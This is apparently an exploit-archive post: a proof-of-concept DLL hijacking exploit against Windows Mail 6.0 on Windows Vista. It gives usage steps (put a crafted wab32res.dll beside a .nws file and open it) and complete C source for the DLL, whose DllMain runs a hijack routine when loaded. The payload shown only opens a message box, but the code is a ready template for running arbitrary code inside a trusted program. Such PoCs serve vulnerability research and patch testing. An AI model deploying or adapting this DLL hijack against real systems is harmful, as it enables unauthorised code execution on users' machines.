Windows Mail 6.0.6000.16386 (wab32res.dll) DLL Hijacking Exploit

2010-08-27 16:34:29

/*
Windows Mail 6.0.6000.16386 (wab32res.dll) DLL Hijacking Exploit

Author: spl0itfish
Version: 6.0.6000.16386
Tested on: Windows Vista Business, Home Premium
How to use: Place a .nws file and wab32res.dll in the same folder and execute .nws file


code for wab32res.dll (compiled with Visual Studio 2008)

*/

#include <windows.h>
#define DllExport __declspec (dllexport)

int hijack()
{
MessageBoxA(0, "Windows Mail DLL Hijacking", "Hijacked!", MB_OK);
return 0;
}

INT WINAPI DllMain(
IN PVOID hInstanceDll,
IN ULONG dwReason,
IN PVOID reserved)
{
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
hijack();
break;

case DLL_THREAD_ATTACH:
break;

case DLL_THREAD_DETACH:
break;

case DLL_PROCESS_DETACH:
break;
}

return TRUE;
}

Fixes

No fixes

In order to submit a new fix you need to be registered.